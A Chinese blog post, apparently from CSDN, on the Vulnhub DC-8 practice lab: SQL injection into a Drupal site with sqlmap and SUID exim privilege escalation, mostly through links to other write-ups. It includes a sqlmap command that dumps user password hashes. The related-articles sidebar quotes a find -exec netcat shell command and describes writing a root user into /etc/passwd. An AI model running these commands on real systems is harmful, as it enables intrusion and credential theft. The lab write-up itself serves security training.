【vulnhub】DC-8渗透实战(SID之exim提权)

最新推荐文章于 2024-04-17 18:27:57 发布
最新推荐文章于 2024-04-17 18:27:57 发布
阅读量357 收藏
点赞数
分类专栏: vulnhub 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/119812428
版权

看这个大的就是了,其他3个小的多多少少有点小问题

https://www.jianshu.com/p/88be9243b01a

https://blog.csdn.net/weixin_43583637/article/details/102828013

这里楼主是直接用sqlmap注入的

sqlmap -u http://192.168.100.136/\?nid\=1 -D d7db -T users -C name,pass --dump

在这里插入图片描述

https://www.cnblogs.com/ph1sh/p/12170658.html
https://www.cnblogs.com/yurang/p/13643028.html
最后楼主也是拿到flag了
在这里插入图片描述

樱浅沐冰
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MTASTS-EXIM-PERL:设计用于Exim MTA的Perl脚本,以符合MTA-STS
02-05
MTASTS-EXIM-PERL 是一组专为 Exim 邮件传输代理(MTA)设计的Perl脚本,其主要目的是帮助系统管理员确保邮件传输的安全性,特别是遵循MTA-STS(邮件传输代理-安全策略传输标准)协议。MTA-STS是互联网工程任务组...
eximExim邮件传输代理-来源,测试套件和文档
01-30
Exim的源代码可以在“exim-master”压缩包中找到,这对于开发者和系统管理员来说是极其宝贵的资源。源代码允许用户自定义和配置Exim以满足特定需求,同时也可以进行深入的故障排查和性能优化。通过阅读源代码,你...
linux sid提权(保姆级教程)
菜鸟学安全的博客
05-30 457
linux提权sid提权保姆级教程。细致讲解。
window系统提权
weixin_43803070的博客
05-28 2608
我们在已经获得了网站的管理权限,最后我们需要获得对服务器的管理权限。利用服务器作为肉鸡。 ** Window s系统内置用户和组 ** 内置用户: Administrator,系统管理员账户,拥有完全控制权限。 Guest,来宾账户,供访问共享资源的网络用户使用,仅具有最基本权限,默认被禁用。 内置用户组: Administrators,管理员组。 Users组,新建用户默认所属的组。 Guest...
Vulnhub靶场渗透测试系列DC-8(sqlmap进行SQL注入和exim4命令提权)
qq_45722813的博客
12-10 3955
Vulnhub靶场渗透测试系列DC-8(sqlmap进行SQL注入和exim4命令提权) 靶机下载地址:https://www.vulnhub.com/entry/dc-8,367/ 将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机 使用nmap进行主机发现,获取靶机IP地址,命令nmap -Pn 192.168.172.1/24 再使用nmap扫描靶机操作系统,开放端口和对应服务等 靶机开放22端口对应ssh服务,80端口对应http服务,这也是一个drupal的网页
DC系列】DC-8靶机渗透练习
serendipity1130的博客
08-31 390
DC-8靶机: 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.152 2.nmap扫描端口: nmap 192.168.225.152 -sV -sC -Pn -n -v -T5 -p- 扫描到22和80端口,访问80端口 3.访问一下,看到drupal框架,点击任意链接,发现类似注入点的地方,测试发现是数字型注入 4.sqlmap可以流程化的跑一跑: python sqlmap.py -u "http://192.168.225.152/?nid=..
内网渗透之——域渗透里常用的域控权限维持方法
wsnbbz的博客
04-03 2471
前言 在我们拿到域控账号密码后,为了防止密码被改,需要使用权限维持来维持我们取得的域控权限 具体域控账号密码获取方法点此跳转 域票据验证流程 1.首先将明文密码发送给AS服务器,AS服务器给我们一个TGT 2.拿着TGT去访问TGS服务器,TGS服务器给我们一个ST 3.使用获取到的ST访问对应的服务 域控权限维持-黄金票据 介绍 ms14068的漏洞原理是伪造域管的TGT,而黄金票...
使用Debian8搭建Exim4邮箱系统
01-08
Exim4 + mysql + clamav * 用 apt-get , testing main 1. 按裝好debian 8.0最小,不要設定exim 先安装好SSH
sa-exim-开源
05-01
sa-exim-4.2.1是sa-exim的一个具体版本,可能包含特定的改进、修复或优化。通常,版本号的升级意味着开发者对原有代码进行了调整,以提高性能、增强安全性或增加新特性。对于使用者来说,升级到新版本可以帮助他们...
Exim4-LDAP-开源
05-01
Exim4-LDAP是Debian的Exim4的一组配置,用于从LDAP数据库获取所有用户帐户信息。 它重用了来自Qmail-LDAP的著名的qmail.schema。 它还可以与Samba-LDAP集成,以进行全面的SMB域管理。
小H靶场笔记:DC-8
Hack_hui的博客
01-09 631
DC-8 Drupal exim提权
靶场提权总结
devil8123665的博客
07-21 2474
1 find root权限提权 find / -perm -u=s -type f 2>/dev/null 查看find权限 find /var/www/index.php -exec whoami \; 返回为“root” 设置nc 反弹shell find /var/www/index.php -exec nc -lvp 9999 -e /bin/sh \; 2 exim4 提权 find / -perm -u=s -type f 2>/dev/null 找到root权
vulnhub靶场之DC-4
qq_58091216的博客
01-09 1047
继续探索在/var/spool/mail目录下发现一封名为jim的邮件邮件内容大致为:我今天要去度假了,所以老板让我给你我的密码,以防有什么事情发生错了。也就是说这里我们又拿到了一个用户名和密码。查看系统里面有什么文件在/home/jim/backups下看到一个old-passwords.bak文件,看名字应该是一堆密码,而且是jim用户使用过的密码。命令的意思大致利用teehee为把如下信息写到/etc/passwd里面,在用户名admin 没有密码为管理员权限,进入的时候运行/bin/bash。
DC-8渗透测试复现
最新发布
m0_63138919的博客
04-17 943
本文为DC8的渗透测试过程
DC-8靶机渗透测试
wwxxss
11-15 794
当用户的密码设置的十分困难时,我们就需要一个字典文件来进行破解,这时我们可以使用John -w –rules :使用字典文件来进行解密,如人们常用hello、admin、password、superman、cooler、asdfgh、 123456等作为自己的密码。因此我使用的桥接模式,我直接开启了我本地的kaliapache服务,让靶机进行下载,所以我把脚本放到我的/tmp下,使用我们的靶机进行下载,然后架上777权限。发现两个用户,且密码被加密了,我们使用john进行破解这些密码,保存在一个文件里。
提权及redis3种未授权访问
梳碧湖的砍柴人
10-07 674
redis及部分提权
Windows提权
haoge1998的博客
04-25 4816
Windows提权 Windows基础知识 一、用户与用户组 在Windows中,不同用户有着不同的权限。主要权限包括有: 完全控制 修改 读取和执行 列出文件夹内容 读取 写入 1、内置用户 Administrator:系统管理员账号,拥有完全控制权 Guest:来宾账号,基本权限,默认时禁用 2、查看本地用户 net user 3、查看用户详细信息 net user darkid 用户也可以属于多个用户组,常见的用户组是 管理组(Administrators)、普通用户组(Users)、i
看完这篇 教你玩转渗透测试靶机vulnhub——DC8
Aluxian_的博客
04-07 2053
Vulnhub靶机DC8渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC8 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.c
linux window文件格式转linux文件格式
loyaltylzr的专栏
12-28 1402
(1)使用linux命令dos2unix filename,直接把文件转换为unix格式; (2)使用sed命令sed -i "s/\r//" filename 或者 sed -i "s/^M//" filename直接替换结尾符为unix格式; (3)vi filename打开文件,执行 : set ff=unix 设置文件为unix,然后执行:wq,保存成unix格式。 查看脚本文件是dos...
Debian8配置指南:Exim4+MySQL+ClamAV邮箱系统搭建
"本教程将指导您如何在Debian 8上使用Exim4、MySQL和ClamAV构建一个电子邮件系统。首先确保安装了Debian 8的最小化版本,并安装SSH服务。接着,逐步安装MySQL服务器、Exim4邮件传输代理以及Courier IMAP/POP3服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值